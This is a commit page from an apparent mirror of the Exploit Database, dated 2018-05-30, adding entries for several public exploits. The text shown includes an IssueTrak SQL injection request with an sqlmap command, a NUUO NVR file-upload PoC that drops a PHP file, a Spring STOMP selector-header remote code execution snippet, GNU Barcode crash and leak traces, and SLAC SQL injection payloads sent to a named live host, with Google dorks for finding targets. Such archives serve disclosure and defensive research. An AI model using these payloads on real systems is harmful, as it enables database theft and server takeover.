bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-30

Browse source 
9 changes to exploits/shellcodes

GNU Barcode 0.99 - Buffer Overflow
GNU Barcode 0.99 - Memory Leak
IssueTrak 7.0 - SQL Injection
Sitemakin SLAC 1.0 -  'my_item_search' SQL Injection
NUUO NVRmini2 / NVRsolo - Arbitrary File Upload
MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting
Pivotal Spring Java Framework < 5.0 - Remote Code Execution
Facebook Clone Script 1.0.5 - 'search' SQL Injection
Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-05-30 05:01:46 +00:00
parent 9fd8680103
commit 96e4f1686b
10 changed files with 762 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

71
exploits/asp/webapps/44792.txt Normal file
View file

@ -0,0 +1,71 @@
================
Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7)
Date: 05-28-2018
Vendor Homepage: http://issuetrak.com
Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely
Google Dork: inurl:"IssueTrak" inurl:"asp"
Discovered By: Chris Anastasio
================
Vulnerable Endpoint
===================
www.example.com/IssueTrak/IssueSearch_Process.asp
Vulnerable Parameters
=====================
Status
Priority
inp_IssueType
SubmittedBy
EnteredBy
AssignedTo
AssignedBy
NextActionBy
ClosedBy
ProjectManager
inp_OrgID
Raw HTTP Request
===========================
POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 905
TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc
SQLMap command
==============
sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch
Notes:
- "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above.
- The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation.
Notes
=====
- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database.
- Authentication is generally required in order to hit this endpoint. If a non SQL injection request is made the reuslt is a redirect to the login page. However, it seems that on the back end, this request touches the database even without authentication, making it exploitable from a pre-authentication vantage point.
- IssueTrak 7.0 was released in 2006
Timeline
========
2018-05-18: Initial vendor contact
2018-05-21: Vendor implies that this version of IssueTrak is no longer supported. Also states that releases starting with 9.7 the application does not suffer from thsi vulnerability
2016-05-28: PoC details published
About Illumant
==============
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/

75
exploits/hardware/webapps/44794.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523
==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================
Vulnerability Description
==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over
the world.
Vulnerable cgi: /upload.php
<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>
As the code above, no any filter, so we can upload a php shell directly to the web server.
==========================
POC EXP
==========================
1. Upload 'nuuonvr.php' to web root path:
POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162
----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
?php phpinfo();@unlink(__FILE__);?
----------969849961--
2. Check if the php file is uploaded successfully:
GET http://192.168.10.1/nuuonvr.php
If the page returns phpinfo info, target is vulnerable!

28
exploits/java/webapps/44796.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to spring STOMP, and putting the key for "selector"
# header, we can execute code on Spring.
# POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
setConnected(true);
console.log('Connected: ' + frame);
stompClient.subscribe('/topic/greetings', function(greeting){
showGreeting(JSON.parse(greeting.body).content);
},header);
});

188
exploits/linux/local/44797.txt Normal file
View file

@ -0,0 +1,188 @@
# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: The vulnerability is caused due to a boundary error in the processing
# of an input file, which can be exploited to cause a buffer overflow when a
# user processes e.g. a specially crafted file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
code93.c:
165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167:
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled 1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
% height xpos ypos width height xpos ypos width
[75.00 10.50 15.00 0.85] [75.00 14.50 15.00 0.85]
[75.00 17.50 15.00 2.85] [75.00 21.50 15.00 2.85]
[75.00 24.50 15.00 0.85] [70.00 27.50 20.00 2.85]
[70.00 33.50 20.00 2.85] [70.00 36.50 20.00 0.85]
[70.00 38.50 20.00 0.85] [70.00 40.50 20.00 0.85]
[70.00 42.50 20.00 0.85] [70.00 46.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 52.50 20.00 0.85]
[70.00 56.50 20.00 0.85] [70.00 58.50 20.00 0.85]
[70.00 60.50 20.00 0.85] [70.00 62.50 20.00 0.85]
[70.00 67.50 20.00 2.85] [70.00 71.50 20.00 2.85]
[70.00 74.50 20.00 0.85] [70.00 78.50 20.00 0.85]
[70.00 82.50 20.00 0.85] [70.00 86.50 20.00 0.85]
[70.00 88.50 20.00 0.85] [70.00 91.50 20.00 2.85]
[70.00 94.50 20.00 0.85] [70.00 96.50 20.00 0.85]
[70.00 100.50 20.00 0.85] [70.00 103.50 20.00 2.85]
[70.00 106.50 20.00 0.85] [70.00 110.50 20.00 0.85]
[70.00 112.50 20.00 0.85] [70.00 116.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 127.50 20.00 2.85] [70.00 130.50 20.00 0.85]
[70.00 132.50 20.00 0.85] [70.00 136.50 20.00 0.85]
[70.00 138.50 20.00 0.85] [70.00 140.50 20.00 0.85]
[70.00 144.50 20.00 0.85] [70.00 148.50 20.00 0.85]
[70.00 152.50 20.00 0.85] [70.00 155.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 160.50 20.00 0.85]
[70.00 162.50 20.00 0.85] [70.00 167.50 20.00 2.85]
[70.00 171.50 20.00 2.85] [70.00 177.50 20.00 2.85]
[70.00 180.50 20.00 0.85] [70.00 182.50 20.00 0.85]
[70.00 184.50 20.00 0.85] [70.00 187.50 20.00 2.85]
[70.00 193.50 20.00 2.85] [70.00 196.50 20.00 0.85]
[70.00 198.50 20.00 0.85] [70.00 200.50 20.00 0.85]
[70.00 202.50 20.00 0.85] [70.00 204.50 20.00 0.85]
[70.00 206.50 20.00 0.85] [70.00 211.50 20.00 2.85]
[70.00 215.50 20.00 2.85] [70.00 219.50 20.00 2.85]
[70.00 225.50 20.00 2.85] [70.00 228.50 20.00 0.85]
[70.00 230.50 20.00 0.85] [70.00 232.50 20.00 0.85]
[70.00 235.50 20.00 2.85] [70.00 241.50 20.00 2.85]
[70.00 244.50 20.00 0.85] [70.00 246.50 20.00 0.85]
[70.00 248.50 20.00 0.85] [70.00 251.50 20.00 2.85]
[70.00 257.50 20.00 2.85] [70.00 260.50 20.00 0.85]
[70.00 262.50 20.00 0.85] [70.00 264.50 20.00 0.85]
[70.00 267.50 20.00 2.85] [70.00 273.50 20.00 2.85]
[70.00 276.50 20.00 0.85] [70.00 278.50 20.00 0.85]
[70.00 280.50 20.00 0.85] [70.00 283.50 20.00 2.85]
[70.00 289.50 20.00 2.85] [70.00 292.50 20.00 0.85]
[70.00 294.50 20.00 0.85] [70.00 296.50 20.00 0.85]
[70.00 299.50 20.00 2.85] [70.00 305.50 20.00 2.85]
[70.00 308.50 20.00 0.85] [70.00 310.50 20.00 0.85]
[70.00 312.50 20.00 0.85] [70.00 315.50 20.00 2.85]
[70.00 321.50 20.00 2.85] [70.00 324.50 20.00 0.85]
[70.00 326.50 20.00 0.85] [70.00 328.50 20.00 0.85]
[70.00 331.50 20.00 2.85] [70.00 337.50 20.00 2.85]
[70.00 340.50 20.00 0.85] [70.00 342.50 20.00 0.85]
[70.00 344.50 20.00 0.85] [70.00 346.50 20.00 0.85]
[70.00 349.50 20.00 2.85] [70.00 354.50 20.00 0.85]
[70.00 357.50 20.00 2.85] [70.00 360.50 20.00 0.85]
[70.00 363.50 20.00 2.85] [70.00 369.50 20.00 2.85]
[70.00 372.50 20.00 0.85] [70.00 374.50 20.00 0.85]
[70.00 376.50 20.00 0.85] [70.00 379.50 20.00 2.85]
[70.00 385.50 20.00 2.85] [70.00 388.50 20.00 0.85]
[70.00 390.50 20.00 0.85] [70.00 392.50 20.00 0.85]
[70.00 395.50 20.00 2.85] [70.00 398.50 20.00 0.85]
[70.00 400.50 20.00 0.85] [70.00 403.50 20.00 2.85]
[70.00 408.50 20.00 0.85] [75.00 410.50 15.00 0.85]
[75.00 414.50 15.00 0.85] [75.00 417.50 15.00 2.85]
[75.00 421.50 15.00 2.85] [75.00 424.50 15.00 0.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(W) 32.00 10.00 12.00]
[(+) 48.00 10.00 0.00]
[(G) 64.00 10.00 0.00]
[($) 80.00 10.00 0.00]
[(A) 96.00 10.00 0.00]
[(+) 112.00 10.00 0.00]
[(M) 128.00 10.00 0.00]
[(%) 144.00 10.00 0.00]
[(K) 160.00 10.00 0.00]
[(W) 176.00 10.00 0.00]
[(W) 192.00 10.00 0.00]
[(G) 208.00 10.00 0.00]
[(W) 224.00 10.00 0.00]
[(W) 240.00 10.00 0.00]
[(W) 256.00 10.00 0.00]
[(W) 272.00 10.00 0.00]
[(W) 288.00 10.00 0.00]
[(W) 304.00 10.00 0.00]
[(W) 320.00 10.00 0.00]
[(W) 336.00 10.00 0.00]
[(9) 352.00 10.00 0.00]
[(W) 368.00 10.00 0.00]
[(W) 384.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"
showpage
%%Page: 2 2
=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
#0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
#1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
#2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
#3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)
0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
'*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==11076==ABORTING

207
exploits/linux/local/44798.txt Normal file
View file

@ -0,0 +1,207 @@
# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)
130: {
131: struct commandline *ptr;
132: char *getopt_desc = (char *)calloc(512, 1);
133: int desc_offset = 0;
134: int opt, retval;
135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
% height xpos ypos width height xpos ypos width
[75.00 11.00 15.00 1.85] [75.00 13.50 15.00 0.85]
[75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85]
[70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85]
[70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85]
[70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85]
[70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85]
[70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85]
[70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85]
[70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85]
[70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85]
[70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85]
[70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85]
[70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85]
[70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85]
[70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85]
[70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85]
[70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85]
[70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85]
[70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85]
[70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85]
[70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85]
[70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85]
[70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85]
[70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85]
[70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85]
[70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85]
[70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85]
[70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85]
[70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85]
[70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85]
[70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85]
[70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85]
[70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85]
[70.00 283.00 20.00 1.85] [70.00 285.50 20.00 0.85]
[70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85]
[70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85]
[70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85]
[70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85]
[70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85]
[70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85]
[70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85]
[70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85]
[70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85]
[70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85]
[70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85]
[70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85]
[70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85]
[70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85]
[70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85]
[70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85]
[70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85]
[70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85]
[70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85]
[70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85]
[70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85]
[70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85]
[70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85]
[70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85]
[70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85]
[70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85]
[70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85]
[70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85]
[70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85]
[70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85]
[70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85]
[70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85]
[70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85]
[70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85]
[70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85]
[70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85]
[70.00 552.00 20.00 1.85] [70.00 555.50 20.00 0.85]
[70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85]
[70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85]
[70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85]
[70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85]
[70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85]
[70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85]
[70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85]
[70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85]
[70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85]
[75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85]
[75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(o) 21.00 10.00 12.00]
[(/) 32.00 10.00 0.00]
[(c) 43.00 10.00 0.00]
[(r) 54.00 10.00 0.00]
[(a) 65.00 10.00 0.00]
[(s) 76.00 10.00 0.00]
[(h) 87.00 10.00 0.00]
[(e) 98.00 10.00 0.00]
[(s) 109.00 10.00 0.00]
[(/) 120.00 10.00 0.00]
[(i) 131.00 10.00 0.00]
[(d) 142.00 10.00 0.00]
[(:) 153.00 10.00 0.00]
[(0) 164.00 10.00 0.00]
[(0) 175.00 10.00 0.00]
[(0) 186.00 10.00 0.00]
[(0) 197.00 10.00 0.00]
[(3) 208.00 10.00 0.00]
[(4) 219.00 10.00 0.00]
[(,) 230.00 10.00 0.00]
[(s) 241.00 10.00 0.00]
[(i) 252.00 10.00 0.00]
[(g) 263.00 10.00 0.00]
[(:) 274.00 10.00 0.00]
[(0) 285.00 10.00 0.00]
[(6) 296.00 10.00 0.00]
[(,) 307.00 10.00 0.00]
[(s) 318.00 10.00 0.00]
[(r) 329.00 10.00 0.00]
[(c) 340.00 10.00 0.00]
[(:) 351.00 10.00 0.00]
[(0) 362.00 10.00 0.00]
[(0) 373.00 10.00 0.00]
[(0) 384.00 10.00 0.00]
[(0) 395.00 10.00 0.00]
[(0) 406.00 10.00 0.00]
[(0) 417.00 10.00 0.00]
[(,) 428.00 10.00 0.00]
[(o) 439.00 10.00 0.00]
[(p) 450.00 10.00 0.00]
[(:) 461.00 10.00 0.00]
[(h) 472.00 10.00 0.00]
[(a) 483.00 10.00 0.00]
[(v) 494.00 10.00 0.00]
[(o) 505.00 10.00 0.00]
[(c) 516.00 10.00 0.00]
[(,) 527.00 10.00 0.00]
[(r) 538.00 10.00 0.00]
[(e) 549.00 10.00 0.00]
[(p) 560.00 10.00 0.00]
[(:) 571.00 10.00 0.00]
[(1) 582.00 10.00 0.00]
[(2) 593.00 10.00 0.00]
[(8) 604.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).

85
exploits/php/webapps/44793.txt Normal file
View file

@ -0,0 +1,85 @@
# # # # #
# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection
# Date: 29-05-2018
# Vendor Homepage: https://sitemakin.com/login-script-demo
# Exploit Author: Divya Jain
# Version: v1.0
# CVE: CVE-2018-11535
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # #
# Proof of Concept:
////////////////////////////////////////////////
SQL Injection in "my_item_search" parameter
////////////////////////////////////////////////
# Affected Link: demo.com/login-script-demo/users.php
# Parameter "my_item_search" is exploitable using xpath injection
# Payload 1:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
# Payload 2:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -
# POC 1 (Result: Table_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
# POC 2 (Result: Column_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
